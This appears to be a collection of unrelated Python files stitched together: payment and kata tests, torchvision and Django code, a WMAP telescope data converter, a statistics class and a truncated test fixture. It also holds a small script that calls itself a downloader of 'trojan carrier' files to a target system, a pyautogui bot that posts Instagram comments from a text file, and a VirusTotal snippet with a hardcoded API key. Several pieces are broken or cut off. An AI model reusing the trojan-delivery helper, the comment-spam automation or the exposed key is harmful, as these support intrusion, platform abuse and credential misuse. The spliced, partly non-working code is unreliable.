b'first_name=John&last_name=Smith&payer_email=buyer%40paypalsandbox.com&' \
b'payer_id=TESTBUYERID01&address_name=John%20Smith&address_country=United%20States&' \
b'address_country_code=US&address_zip=95131&address_state=CA&address_city=San%20Jose&' \
b'address_street=123%20any%20street&business=seller%40paypalsandbox.com&' \
b'receiver_email=seller%40paypalsandbox.com&receiver_id=seller%40paypalsandbox.com&' \
b'residence_country=US&item_name=something&item_number=AK-1234&quantity=1&shipping=3.04&' \
b'tax=2.02&mc_currency=USD&mc_fee=0.44&mc_gross=131.22&mc_gross1=131.22&txn_type=web_accept&' \
b'txn_id=153826001¬ify_version=2.1&custom=xyz123&invoice=abc1234&test_ipn=1&' \
b'verify_sign=AiPC9BjkCyDFQXbSkoZcgqH3hpacAIG977yabdROlR9d0bf98jevF2-i'
self.post_to_ipn_handler(paypal_input)
ipn = self.get_ipn()
self.assertFalse(ipn.flag)
|
import unittest
from katas.kyu_6.autocomplete_yay import autocomplete
class AutocompleteTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(autocomplete(
'ai', ['airplane', 'airport', 'apple', 'ball']),
['airplane', 'airport'])
def test_equals_2(self):
self.assertEqual(autocomplete('ai', [
'abnormal', 'arm-wrestling', 'absolute', 'airplane',
'airport', 'amazing', 'apple', 'ball']),
['airplane', 'airport'])
def test_equals_3(self):
self.assertEqual(autocomplete('a', [
'abnormal', 'arm-wrestling', 'absolute', 'airplane', 'airport',
'amazing', 'apple', 'ball']), [
'abnormal', 'arm-wrestling', 'absolute', 'airplane', 'airport'])
|
from __future__ import annotations
import os
import sys
from typing import Any, BinaryIO, Optional, Tuple, Type, TypeVar, Union
import PIL.Image
import torch
from torchvision.prototype.utils._internal import fromfile, ReadOnlyTensorBuffer
from torchvision.tv_tensors._tv_tensor import TVTensor
D = TypeVar("D", bound="EncodedData")
class EncodedData(TVTensor):
@classmethod
def _wrap(cls: Type[D], tensor: torch.Tensor) -> D:
return tensor.as_subclass(cls)
def __new__(
cls,
data: Any,
*,
dtype: Optional[torch.dtype] = None,
device: Optional[Union[torch.device, str, int]] = None,
requires_grad: bool = False,
) -> EncodedData:
tensor = cls._to_tensor(data, dtype=dtype, device=device, requires_grad=requires_grad)
# TODO: warn / bail out if we encounter a tensor with shape other than (N,) or with dtype other than uint8?
return cls._wrap(tensor)
@classmethod
def wrap_like(cls: Type[D], other: D, tensor: torch.Tensor) -> D:
return cls._wrap(tensor)
@classmethod
def from_file(cls: Type[D], file: BinaryIO, **kwargs: Any) -> D:
encoded_data = cls(fromfile(file, dtype=torch.uint8, byte_order=sys.byteorder), **kwargs)
file.close()
return encoded_data
@classmethod
def from_path(cls: Type[D], path: Union[str, os.PathLike], **kwargs: Any) -> D:
with open(path, "rb") as file:
return cls.from_file(file, **kwargs)
class EncodedImage(EncodedData):
# TODO: Use @functools.cached_property if we can depend on Python 3.8
@property
def spatial_size(self) -> Tuple[int, int]:
if not hasattr(self, "_spatial_size"):
with PIL.Image.open(ReadOnlyTensorBuffer(self)) as image:
self._spatial_size = image.height, image.width
return self._spatial_size
|
#!/usr/bin/env python3
"""A simple script used to download files to the target system.
Uses Python 3"""
import argparse
import requests
def get_arguments():
"""Get user supplied arguments from terminal."""
parser = argparse.ArgumentParser()
# arguments
parser.add_argument('-t', '--target', dest='target', help='File to obtain from the Internet.')
(options, arguments) = parser.parse_args()
return options
def download(url):
"""Obtains a document from the Internet to use as a trojan carrier file."""
get_response = requests.get(url)
file_name = url.split('/')[-1]
with open(file_name, 'wb') as out_file:
"""Writes output to file on local disk"""
out_file.write(get_response.content)
options = get_arguments()
download('')
|
import pyautogui, time
import random
time.sleep(5)
f=open("instagram_comments.txt",'r')
for word in f:
ccc = random.randrange(1,5,2)
cc = random.randrange(1,8, 3)
c = random.randrange(20,30, cc)
print('2.SLeeping time: ')
print(c)
pyautogui.typewrite(word)
time.sleep(ccc)
print('1.Sleeping time: ')
print(ccc)
pyautogui.press("enter")
time.sleep(c)
pyautogui.dragTo(1650, 860, button='left')
|
# Generated by Django 3.1.7 on 2021-04-01 21:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Gestion', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='hijo',
name='id',
field=models.AutoField(primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='padre',
name='id',
field=models.AutoField(primary_key=True, serialize=False),
),
]
|
#!/usr/bin/python
import simplejson
import urlib
import urllib2
url = "https://www.virustotal.com/vtapi/v2/url/scan"
parameters = {"url": "https://www.virustotal.com/vtapi/v2/url/scan", "apikey": "af492b1351def36003ae0d7e8210bf000c8c52d5c1a7e37a057af865f90c5937"}
|
# coding=utf-8
"""
题目:
输入数字n,按顺序打印从1到最大的n位十进制数.比如输入3,则打印出1、2、3一直到到最大的3位数999
"""
import sys
def increment(number_char_array):
# 进位
carry = 0
is_overflow = False
for index in reversed(range(len(number_char_array))):
number = int(number_char_array[index]) + carry
if index == len(number_char_array) - 1:
number += 1
if number >= 10:
if index == 0:
is_overflow = True
number -= 10
number_char_array[index] = str(number)
carry = 1
else:
number_char_array[index] = str(number)
break
return is_overflow
def print_number_char_array(number_char_array):
is_begin = False
for index in range(len(number_char_array)):
if not is_begin and number_char_array[index] != '0':
is_begin = True
if is_begin:
sys.stdout.write(number_char_array[index])
print
def print_1_to_max_of_n_digits(n):
if n <= 0:
return
number_char_array = ['0' for _ in range(n)]
while (not increment(number_char_array)):
print_number_char_array(number_char_array)
def print_1_to_max_of_n_digits_recursively(n):
if n <= 0:
return
number_char_array = ['0' for _ in range(n)]
for i in range(10):
process(number_char_array, n, 0)
def process(number_char_array, length, index):
if index == length:
print_number_char_array(number_char_array)
return
for i in range(10):
number_char_array[index] = str(i)
process(number_char_array, length, index + 1)
if __name__ == '__main__':
print_1_to_max_of_n_digits_recursively(2)
|
import matplotlib.pyplot as plt
import numpy as np
from astropy.io import fits
import h5py
import healpy as hp
from pytest import approx
from glob import glob
import multiprocessing as mp
from multiprocessing import Pool
from joblib import Parallel, delayed
import huffman
from scipy.interpolate import interp1d
from joblib import Parallel, delayed
import os
prefix = '/mn/stornext/d16/cmbco/bp/wmap/'
from time import sleep
from time import time as timer
from mpi4py import MPI
rank = MPI.COMM_WORLD.rank
def write_file_parallel(file_ind, i, obsid, obs_ind, daflags, TODs, gain_guesses,
band_labels, band, psi_A, psi_B, pix_A, pix_B, fknee, alpha, n_per_day,
ntodsigma, npsi, psiBins, nside, fsamp, pos, vel, time):
file_out = prefix + f'data/wmap_{band}_{str(file_ind//10+1).zfill(6)}.h5'
with open(prefix + f'data/filelist_{band}.txt', 'a') as file_list:
file_list.write(f'{str(obs_ind).zfill(6)}\t"{file_out}"\t1\t0\t0\n')
dt0 = np.diff(time).mean()
det_list = []
# make huffman code tables
pixArray_A = [[], [], []]
pixArray_B = [[], [], []]
todArray = []
for j in range(len(band_labels)):
label = band_labels[j]
if label[:-2] == band.upper():
TOD = TODs[j]
gain = gain_guesses[j]
sigma_0 = TOD.std()
scalars = np.array([gain, sigma_0, fknee, alpha])
tod = np.zeros(TOD.size)
for n in range(len(TOD[0])):
tod[n::len(TOD[0])] = TOD[:,n]
todi = np.array_split(tod, n_per_day)[i]
todInd = np.int32(ntodsigma*todi/(sigma_0*gain))
delta = np.diff(todInd)
delta = np.insert(delta, 0, todInd[0])
todArray.append(delta)
pix = np.array_split(pix_A[j//4], n_per_day)[i]
delta = np.diff(pix)
delta = np.insert(delta, 0, pix[0])
pixArray_A[0].append(delta)
pix = np.array_split(pix_B[j//4], n_per_day)[i]
delta = np.diff(pix)
delta = np.insert(delta, 0, pix[0])
pixArray_B[0].append(delta)
psi = np.array_split(psi_A[j//4], n_per_day)[i]
psi = np.where(psi < 0, 2*np.pi+psi, psi)
psi = np.where(psi >= 2*np.pi, psi - 2*np.pi, psi)
psiIndexes = np.digitize(psi, psiBins)
delta = np.diff(psiIndexes)
delta = np.insert(delta, 0, psiIndexes[0])
pixArray_A[1].append(delta)
psi = np.array_split(psi_B[j//4], n_per_day)[i]
psi = np.where(psi < 0, 2*np.pi+psi, psi)
psi = np.where(psi >= 2*np.pi, psi - 2*np.pi, psi)
psiIndexes = np.digitize(psi, psiBins)
delta = np.diff(psiIndexes)
delta = np.insert(delta, 0, psiIndexes[0])
pixArray_B[1].append(delta)
flags = np.array_split(daflags[:,j//4], n_per_day)[i]
t0 = np.arange(len(flags))
t = np.linspace(t0.min(), t0.max(), len(todi))
func = interp1d(t0, flags, kind='previous')
flags = func(t)
delta = np.diff(flags)
delta = np.insert(delta, 0, flags[0])
pixArray_A[2].append(delta)
pixArray_B[2].append(delta)
h_A = huffman.Huffman("", nside)
h_A.GenerateCode(pixArray_A)
h_B = huffman.Huffman("", nside)
h_B.GenerateCode(pixArray_B)
h_Tod = huffman.Huffman("", nside)
h_Tod.GenerateCode(todArray)
huffarray_A = np.append(np.append(np.array(h_A.node_max), h_A.left_nodes), h_A.right_nodes)
huffarray_B = np.append(np.append(np.array(h_B.node_max), h_B.left_nodes), h_B.right_nodes)
huffarray_Tod = np.append(np.append(np.array(h_Tod.node_max), h_Tod.left_nodes), h_Tod.right_nodes)
with h5py.File(file_out, 'a') as f:
for j in range(len(band_labels)):
label = band_labels[j]
if label[:-2] == band.upper():
TOD = TODs[j]
gain = gain_guesses[j]
sigma_0 = TOD.std()
scalars = np.array([gain, sigma_0, fknee, alpha])
tod = np.zeros(TOD.size)
for n in range(len(TOD[0])):
tod[n::len(TOD[0])] = TOD[:,n]
todi = np.array_split(tod, n_per_day)[i]
todInd = np.int32(ntodsigma*todi/(sigma_0*gain))
deltatod = np.diff(todInd)
deltatod = np.insert(deltatod, 0, todInd[0])
pix = np.array_split(pix_A[j//4], n_per_day)[i]
deltapixA = np.diff(pix)
deltapixA = np.insert(deltapixA, 0, pix[0])
pix = np.array_split(pix_B[j//4], n_per_day)[i]
deltapixB = np.diff(pix)
deltapixB = np.insert(deltapixB, 0, pix[0])
psi = np.array_split(psi_A[j//4], n_per_day)[i]
psi = np.where(psi < 0, 2*np.pi+psi, psi)
psi = np.where(psi >= 2*np.pi, psi - 2*np.pi, psi)
psiIndexes = np.digitize(psi, psiBins)
deltapsiA = np.diff(psiIndexes)
deltapsiA = np.insert(deltapsiA, 0, psiIndexes[0])
psi = np.array_split(psi_B[j//4], n_per_day)[i]
psi = np.where(psi < 0, 2*np.pi+psi, psi)
psi = np.where(psi >= 2*np.pi, psi - 2*np.pi, psi)
psiIndexes = np.digitize(psi, psiBins)
deltapsiB = np.diff(psiIndexes)
deltapsiB = np.insert(deltapsiB, 0, psiIndexes[0])
flags = np.array_split(daflags[:,j//4], n_per_day)[i]
t0 = np.arange(len(flags))
t = np.linspace(t0.min(), t0.max(), len(todi))
func = interp1d(t0, flags, kind='previous')
flags = func(t)
deltaflag = np.diff(flags)
deltaflag = np.insert(deltaflag, 0, flags[0])
f.create_dataset(obsid + '/' + label.replace('KA','Ka') + '/flag',
data=np.void(bytes(h_A.byteCode(deltaflag))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/tod',
data=np.void(bytes(h_Tod.byteCode(deltatod))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/pixA',
data=np.void(bytes(h_A.byteCode(deltapixA))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/pixB',
data=np.void(bytes(h_B.byteCode(deltapixB))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/psiA',
data=np.void(bytes(h_A.byteCode(deltapsiA))))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/psiB',
data=np.void(bytes(h_B.byteCode(deltapsiB))))
det_list.append(label.replace('KA','Ka'))
f.create_dataset(obsid + '/' + label.replace('KA','Ka')+ '/scalars',
data=scalars)
f[obsid + '/' + label.replace('KA','Ka') + '/scalars'].attrs['legend'] = 'gain, sigma0, fknee, alpha'
# filler
f.create_dataset(obsid + '/' + label.replace('KA','Ka') + '/outP',
data=np.array([0,0]))
f.create_dataset(obsid + '/common/hufftree_A', data=huffarray_A)
f.create_dataset(obsid + '/common/huffsymb_A', data=h_A.symbols)
f.create_dataset(obsid + '/common/hufftree_B', data=huffarray_B)
f.create_dataset(obsid + '/common/huffsymb_B', data=h_B.symbols)
f.create_dataset(obsid + '/common/todtree', data=huffarray_Tod)
f.create_dataset(obsid + '/common/todsymb', data=h_Tod.symbols)
f.create_dataset(obsid + '/common/satpos',
data=np.array_split(pos,n_per_day)[i][0])
f[obsid + '/common/satpos'].attrs['info'] = '[x, y, z]'
f[obsid + '/common/satpos'].attrs['coords'] = 'galactic'
f.create_dataset(obsid + '/common/vsun',
data=np.array_split(vel,n_per_day)[i][0])
f[obsid + '/common/vsun'].attrs['info'] = '[x, y, z]'
f[obsid + '/common/vsun'].attrs['coords'] = 'galactic'
dt = dt0/len(TOD[0])
time_band = np.arange(time.min(), time.min() + dt*len(tod), dt)
f.create_dataset(obsid + '/common/time',
data=[np.array_split(time_band, n_per_day)[i][0],0,0])
f[obsid + '/common/time'].attrs['type'] = 'MJD, null, null'
f.create_dataset(obsid + '/common/ntod',
data=len(np.array_split(tod,n_per_day)[i]))
if "/common/fsamp" not in f:
f.create_dataset('/common/fsamp', data=fsamp*len(TOD[0]))
f.create_dataset('/common/nside', data=nside)
f.create_dataset('/common/npsi', data=npsi)
f.create_dataset('/common/det', data=np.string_(', '.join(det_list)))
f.create_dataset('/common/datatype', data='WMAP')
# fillers
f.create_dataset('/common/mbang', data=0)
f.create_dataset('/common/ntodsigma', data=100)
f.create_dataset('/common/polang', data=0)
return
def coord_trans(pos_in, coord_in, coord_out, lonlat=False):
r = hp.rotator.Rotator(coord=[coord_in, coord_out])
pos_out = r(pos_in.T).T
if lonlat:
if pos_out.shape[1] == 2:
return pos_out
elif pos_out.shape[1] == 3:
return hp.vec2dir(pos_out.T, lonlat=True).T
else:
return pos_out
def Q2M(Q):
'''
PURPOSE:
Converts quaternions to rotation matrices.
CALLING SEQUENCE:
M =Q2M(Q)
INPUTS:
Q - Quaternions. May be a 2-D array dimensioned 4xN or
simply a vector dimensioned 4.
OUTPUTS:
M - Cube of attitude rotation matrices, 3x3xN (or 3x3
if only one input quaternion).
'''
q1=-Q[0,:]
q2=-Q[1,:]
q3=-Q[2,:]
q4= Q[3,:]
q11=q1*q1
q22=q2*q2
q33=q3*q3
q44=q4*q4
s=q11+q22+q33+q44
w = (abs(s-1.0) > 1.0e-5)
if sum(w) > 0:
s=np.sqrt(s)
q1=q1/s
q2=q2/s
q3=q3/s
q4=q4/s
q12=q1*q2
q13=q1*q3
q14=q1*q4
q23=q2*q3
q24=q2*q4
q34=q3*q4
M = np.zeros((len(q1), 3,3))
M[:,0,0] = q11 - q22 - q33 + q44
M[:,0,1] = 2. * ( q12 + q34 )
M[:,0,2] = 2. * ( q13 - q24 )
M[:,1,0] = 2. * ( q12 - q34 )
M[:,1,1] = -q11 + q22 - q33 + q44
M[:,1,2] = 2. * ( q23 + q14 )
M[:,2,0] = 2. * ( q13 + q24 )
M[:,2,1] = 2. * ( q23 - q14 )
M[:,2,2] = -q11 - q22 + q33 + q44
M = np.transpose(M, [1,2,0])
return M
def gamma_from_pol(gal, pol, fixed_basis=False):
'''
It should be possible to distribute the inner product among all time
observations, but the matrix algebra is escaping me right now. In any case,
for a one time operation this doesn't seem too slow yet.
'''
# gal and pol are galactic lonlat vectors
dir_A_gal = hp.ang2vec(gal[:,0],gal[:,1], lonlat=False)
dir_A_pol = hp.ang2vec(pol[:,0],pol[:,1], lonlat=False)
dir_Z = np.array([0,0,1])
sin_theta_A = np.sqrt(dir_A_gal[:,0]**2 + dir_A_gal[:,1]**2)
dir_A_west_x = dir_A_gal[:,1]/sin_theta_A
dir_A_west_y = -dir_A_gal[:,0]/sin_theta_A
dir_A_west_z = dir_A_gal[:,1]*0
dir_A_west = np.array([dir_A_west_x, dir_A_west_y, dir_A_west_z]).T
dir_A_north = (dir_Z - dir_A_gal[2]*dir_A_gal)/sin_theta_A[:,np.newaxis]
'''
if sin_theta_A == 0:
dir_A_west = np.array([1,0,0])
dir_A_north = np.array([0,1,0])
assert dir_A_north.dot(dir_A_west) == approx(0), 'Vectors not orthogonal'
assert dir_A_north.dot(dir_A_north) == approx(1), 'North-vector not normalized'
assert dir_A_west.dot(dir_A_west) == approx(1), 'North-vector not normalized'
'''
sin_gamma_A = dir_A_pol[:,0]*dir_A_west[:,0] + dir_A_pol[:,1]*dir_A_west[:,1] + dir_A_pol[:,2]*dir_A_west[:,2]
cos_gamma_A = dir_A_pol[:,0]*dir_A_north[:,0] + dir_A_pol[:,1]*dir_A_north[:,1] + dir_A_pol[:,2]*dir_A_north[:,2]
cos_2_gamma_A = 2*cos_gamma_A**2 - 1
sin_2_gamma_A = 2*sin_gamma_A*cos_gamma_A
return sin_2_gamma_A, cos_2_gamma_A
def q_interp(q_arr, t):
'''
Copied from interpolate_quaternions.pro
This is an implementation of Lagrange polynomials.
; input_q - Set of 4 evenly-spaced quaternions (in a 4x4 array).
; See the COMMENTS section for how this array should
; be arranged.
; offset - Dimensionless time offset relative to the first quaternion.
; This routine expects a unifomly sampled set of quaternions Q1,Q2,Q3,Q4.
; It interpolate a quaternion for any time between Q1 and Q4, inclusive.
; The output is calculated at a time T_Out, expressed in terms of the
; sampling of the input quaternions:
;
; T_Out - T(Q1)
; Offset = -----------------
; T(Q2) - T(Q1)
;
; where T(Q1) is the time at quaternion Q1, and so forth. That is,
; the time for the output quaternion (variable OFFSET) should be
; a number in the range -1.000 to 4.000 inclusive. Input values outside
; that range result in an error. Input values outside 0.0 to 3.0 result
; in extrapolation instead of interpolation.
;
; In other words, Offset is essentially a floating point subscript,
; similar to the those used by the IDL intrinsic routine INTERPOLATE.
;
; For optimal results, OFFSET should be in the range [1.0, 2.0] -- that
; is, the input quaternions Q1...Q4 should be arranged such that 2 come
; before the desired output and 2 come after.
'''
xp0 = t-1
xn0 = -xp0
xp1 = xp0 + 1
xn1 = xp0 - 1
xn2 = xp0 - 2
w = np.array([xn0*xn1*xn2/6, xp1*xn1*xn2/2, xp1*xn0*xn2/2, xp1*xp0*xn1/6])
Qi = q_arr.dot(w)
Qi = Qi/np.sum(Qi**2, axis=0)**0.5
return Qi
def quat_to_sky_coords(quat, center=True):
Nobs_array = np.array([12, 12, 15, 15, 20, 20, 30, 30, 30, 30])
'''
Quaternion is of form (N_frames, 30, 4), with one redundant frame at the
beginning and two redundant ones at the end, that match the adjacent frames.
'''
nt = len(quat)
Q = np.zeros( (4, 33, nt))
q0 = quat[:,0::4]
q1 = quat[:,1::4]
q2 = quat[:,2::4]
q3 = quat[:,3::4]
q0 = np.array([q0[0,0]] + q0[:,1:-2].flatten().tolist() +
q0[-1,-2:].tolist())
q1 = np.array([q1[0,0]] + q1[:,1:-2].flatten().tolist() +
q1[-1,-2:].tolist())
q2 = np.array([q2[0,0]] + q2[:,1:-2].flatten().tolist() +
q2[-1,-2:].tolist())
q3 = np.array([q3[0,0]] + q3[:,1:-2].flatten().tolist() +
q3[-1,-2:].tolist())
Q = np.zeros((4, 30*nt + 3))
Q[0] = q0
Q[1] = q1
Q[2] = q2
Q[3] = q3
t0 = np.arange(30*nt + 3)
da_str = ''
dir_A_los = np.array([
[ 0.03997405, 0.92447851, -0.37913264],
[-0.03834152, 0.92543237, -0.37696797],
[-0.03156996, 0.95219303, -0.30386144],
[ 0.03194693, 0.95220414, -0.3037872 ],
[-0.03317037, 0.94156392, -0.33519711],
[ 0.03336979, 0.94149584, -0.33536851],
[-0.0091852 , 0.93943624, -0.34260061],
[-0.00950387, 0.94586233, -0.32442894],
[ 0.00980826, 0.9457662 , -0.32470001],
[ 0.00980739, 0.93934639, -0.34282965]])
dir_B_los = np.array([
[ 0.03795967, -0.92391895, -0.38070045],
[-0.0400215 , -0.92463091, -0.37875581],
[-0.03340367, -0.95176817, -0.30499432],
[ 0.03014983, -0.95193039, -0.30482702],
[-0.03504541, -0.94094355, -0.33674479],
[ 0.03143652, -0.94113826, -0.33655687],
[-0.01148033, -0.93883144, -0.3441856 ],
[-0.01158651, -0.94535168, -0.32584651],
[ 0.00767888, -0.9454096 , -0.32579398],
[ 0.00751565, -0.93889159, -0.34413092]])
dir_A_pol = np.array([
[ 0.69487757242271, -0.29835139515692, -0.65431766318192, ],
[ -0.69545992357813, -0.29560553030986, -0.65494493291187, ],
[ 0.71383872060219, -0.19131247543171, -0.67367189173456, ],
[ -0.71390969181845, -0.19099503229669, -0.67368675923286, ],
[ -0.69832280289930, -0.26176968417604, -0.66619959126169, ],
[ 0.69826122350352, -0.26204606404493, -0.66615548040223, ],
[ 0.70944248806767, -0.23532277684296, -0.66431509603747, ],
[ -0.70476543555624, -0.23649685267332, -0.66886091193973, ],
[ 0.70468980214241, -0.23690904054153, -0.66879472879665, ],
[ -0.70959923775957, -0.23501806310177, -0.66425554705017]])
dir_B_pol = np.array([
[ 0.69546590081501, 0.29798590641998, -0.65385899120425,],
[ -0.69486414021667, 0.29814186328140, -0.65442742607568, ],
[ 0.71423586688235, 0.19072845484161, -0.67341650037147, ],
[ -0.71357469183546, 0.19306390125546, -0.67345192048426, ],
[ -0.69775710213559, 0.26425762446771, -0.66580998365151, ],
[ 0.69876566230957, 0.26145991550208, -0.66585678772745, ],
[ 0.71002796142313, 0.23471528678222, -0.66390438178103, ],
[ -0.70422900931886, 0.23906270891214, -0.66851366750529, ],
[ 0.70521159225086, 0.23611413753036, -0.66852578425466, ],
[ -0.70903152581832, 0.23766935833457, -0.66391834701609]])
M = Q2M(Q)
M = np.transpose(M, [2,0,1])
gal_A = []
pol_A = []
gal_B = []
pol_B = []
for n, Nobs in enumerate(Nobs_array):
# for each group from 0--4, the interpolation is valid between 1.5--2.5,
# which is equivalent to cutting out the first 1.5 time units from the
# beginning of the total array and the final set of quaternions does not
# need the last half of the time interval.
t = np.arange(t0.min() + 1.5, t0.max() - 0.5, 1/Nobs)
M2 = np.zeros((len(t), 3, 3))
for i in range(3):
for j in range(3):
f = interp1d(t0, M[:,i,j], kind='cubic')
M2[:,i,j] = f(t)
Npts = 30*nt*Nobs
dir_A_los_cel = []
dir_B_los_cel = []
dir_A_los_cel = np.sum(M2*np.tile(dir_A_los[n, np.newaxis, np.newaxis,:], (Npts,3,1)),axis=2)
dir_B_los_cel = np.sum(M2*np.tile(dir_B_los[n, np.newaxis, np.newaxis,:], (Npts,3,1)),axis=2)
dir_A_los_gal = coord_trans(dir_A_los_cel, 'C', 'G')
Pll_A = np.array(hp.vec2ang(dir_A_los_gal, lonlat=False))
dir_B_los_gal = coord_trans(dir_B_los_cel, 'C', 'G')
Pll_B = np.array(hp.vec2ang(dir_B_los_gal, lonlat=False))
gal_A.append(Pll_A.T)
gal_B.append(Pll_B.T)
dir_A_pol_cel = np.sum(M2*np.tile(dir_A_pol[n, np.newaxis, np.newaxis,:], (Npts,3,1)),axis=2)
dir_B_pol_cel = np.sum(M2*np.tile(dir_B_pol[n, np.newaxis, np.newaxis,:], (Npts,3,1)),axis=2)
dir_A_pol_gal = coord_trans(dir_A_pol_cel, 'C', 'G')
Pll_A = np.array(hp.vec2ang(dir_A_pol_gal, lonlat=False))
dir_B_pol_gal = coord_trans(dir_B_pol_cel, 'C', 'G')
Pll_B = np.array(hp.vec2ang(dir_B_pol_gal, lonlat=False))
pol_A.append(Pll_A.T)
pol_B.append(Pll_B.T)
return gal_A, gal_B, pol_A, pol_B
def get_psi(gal, pol, band_labels):
sin_2_gamma = np.zeros( (len(band_labels), len(gal[0])) )
cos_2_gamma = np.zeros( (len(band_labels), len(gal[0])) )
psi = []
for band in range(len(band_labels)):
sin2g, cos2g = gamma_from_pol(gal[band], pol[band])
psi.append(0.5*np.arctan2(sin2g, cos2g))
return psi
def get_psi_multiprocessing(gal, pol):
sin_2_gamma = np.zeros(len(gal))
cos_2_gamma = np.zeros(len(gal))
for t in range(len(sin_2_gamma)):
sin_2_gi, cos_2_gi = gamma_from_pol(gal[t], pol[t])
sin_2_gamma[t] = sin_2_gi
cos_2_gamma[t] = cos_2_gi
psi = 0.5*np.arctan2(sin_2_gamma, cos_2_gamma)
return psi
def get_psi_multiprocessing_2(i):
gal = gals[i]
pol = pols[i]
sin_2_gamma = np.zeros(len(gal))
cos_2_gamma = np.zeros(len(gal))
for t in range(len(sin_2_gamma)):
sin_2_gi, cos_2_gi = gamma_from_pol(gal[t], pol[t])
sin_2_gamma[t] = sin_2_gi
cos_2_gamma[t] = cos_2_gi
psi = 0.5*np.arctan2(sin_2_gamma, cos_2_gamma)
return psi
def ang2pix_multiprocessing(nside, theta, phi):
return hp.ang2pix(nside, theta, phi)
def fits_to_h5(file_input, file_ind):
f_name = file_input.split('/')[-1][:-8]
# It takes about 30 seconds for the extraction from the fits files, which is
# very CPU intensive. After that, it maxes out at 1 cpu/process.
t0 = timer()
# from table 3 of astro-ph/0302222
gain_guesses = np.array([ -0.974, +0.997,
+1.177, -1.122,
+0.849, -0.858,
-1.071, +0.985,
+1.015, -0.948,
+0.475, -0.518,
-0.958, +0.986,
-0.783, +0.760,
+0.449, -0.494,
-0.532, +0.532,
-0.450, +0.443,
+0.373, -0.346,
+0.311, -0.332,
+0.262, -0.239,
-0.288, +0.297,
+0.293, -0.293,
-0.260, +0.281,
-0.263, +0.258,
+0.226, -0.232,
+0.302, -0.286])
alpha = -1
fknee = 0.1
nside = 256
ntodsigma = 100
npsi = 2048
psiBins = np.linspace(0, 2*np.pi, npsi)
fsamp = 30/1.536 # A single TOD record contains 30 1.536 second major science frames
chunk_size = 1875
nsamp = chunk_size*fsamp
chunk_list = np.arange(25)
# WMAP data divides evenly into 25 chunks per day...
bands = ['K1', 'Ka1', 'Q1', 'Q2', 'V1', 'V2', 'W1', 'W2', 'W3', 'W4']
#bands = ['K1']
t2jd = 2.45e6
jd2mjd = 2400000.5
data = fits.open(file_input)
band_labels = data[2].columns.names[1:-6]
daflags = data[2].data['daflags']
TODs = []
for key in data[2].columns.names[1:-6]:
TODs.append(data[2].data[key])
# position (and velocity) in km(/s) in Sun-centered coordinates
pos = data[1].data['POSITION']
vel = data[1].data['VELOCITY']
time_aihk = data[1].data['TIME'] + t2jd - jd2mjd
time = data[2].data['TIME'] + t2jd - jd2mjd
dt0 = np.diff(time).mean()
gal_A, gal_B, pol_A, pol_B = quat_to_sky_coords(data[1].data['QUATERN'])
psi_A = get_psi(gal_A, pol_A, band_labels[::4])
psi_B = get_psi(gal_B, pol_B, band_labels[1::4])
args_A = [(nside, gal_A[i][:,0], gal_A[i][:,1]) for i in range(len(gal_A))]
args_B = [(nside, gal_B[i][:,0], gal_B[i][:,1]) for i in range(len(gal_B))]
pix_A = []
pix_B = []
for i in range(len(args_A)):
pix_A.append(ang2pix_multiprocessing(*args_A[i]))
pix_B.append(ang2pix_multiprocessing(*args_B[i]))
n_per_day = 25
obs_inds = np.arange(n_per_day) + n_per_day*file_ind
obsids = [str(obs_ind).zfill(6) for obs_ind in obs_inds]
for band in bands:
args = [(file_ind, i, obsids[i], obs_inds[i], daflags, TODs, gain_guesses,
band_labels, band, psi_A, psi_B, pix_A, pix_B, fknee,
alpha, n_per_day, ntodsigma, npsi, psiBins, nside,
fsamp, pos, vel, time) for i in range(len(obs_inds))]
for i in range(n_per_day):
write_file_parallel(*args[i])
data.close()
print(f'\t{f_name} took {int(timer()-t0)} seconds')
sleep(30)
return
def main():
'''
Make 1 hdf5 file for every 10 fits files
'''
files = glob(prefix + 'tod/*.fits')
files.sort()
files = np.array(files)
inds = np.arange(len(files))
nprocs = 128
os.environ['OMP_NUM_THREADS'] = '1'
pool = Pool(processes=nprocs)
x = [pool.apply_async(fits_to_h5, args=[f, i]) for i, f in zip(inds, files)]
for i, res in enumerate(x):
#res.get()
res.wait()
pool.close()
pool.join()
if __name__ == '__main__':
main()
|
class Data:
def __init__(self, p):
self.p = p
def variance(self):
self.variance = 0
for i in self.p:
self.variance +=(i-(sum(self.p)/len(self.p)))**2
print(self.variance/(len(self.p)-1))
def mean(self):
print(sum(self.p)/len(self.p))
def sd(self):
self.variance = 0
for i in self.p:
self.variance +=(i-(sum(self.p)/len(self.p)))**2
print((self.variance/(len(self.p)-1))**0.5)
def median(self):
self.p = sorted(self.p)
if(len(self.p)%2 == 0):
print((self.p[(len(self.p)-1)//2]+self.p[((len(self.p)-1)//2) + 1]) / 2)
else:
print(self.p[len(self.p)//2])
def quartile(self,percentile):
self.p = sorted(self.p)
self.percentile = percentile
self.index = (self.percentile/100) * (len(self.p)-1)
# self.remainder = self.index - round(self.index)
#print(self.remainder, self.index)
print("__________")
print(self.index)
print(self.p[round(self.index)])# + self.remainder*(self.p[round(self.index)+1]) - self.p[round(self.index)])
if __name__ == "__main__":
# 1240 1200 1010 940 1100 1450 1750 2000 2100 1020 1500 2010 2750 3030 1400 750 1200 1100 1500 3510 4500 7000
p = list(map(int,input().split()))
q = [i-1500 for i in p]
Data_Object = Data(p)
Data_Object_2 = Data(q)
Data_Object.quartile(25)
Data_Object.quartile(50)
Data_Object.quartile(75)
Data_Object.quartile(99)
# Data_Object.median()
# Data_Object.mean()
# Data_Object.variance()
# Data_Object_1.sd()
# Data_Object_2.sd()
|
import numpy as np
from cloudmetrics.utils import make_periodic_mask
def _parse_example_mask(s):
return np.array([[float(c) for c in line] for line in s.strip().splitlines()])
EXAMPLE_MASK = _parse_example_mask(
"""
00011000
11000011
11011011
00011000
00000000
00000000
00011000
00011000
"""
)
EXAMPLE_MASK_DOUBLED = _parse_example_mask(
"""
0000000000000000
0000001111000000
0001101111000000
0001100000000000
0000000000000000
0000000000000000
0001100000000000
0001100000000000
0001100000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
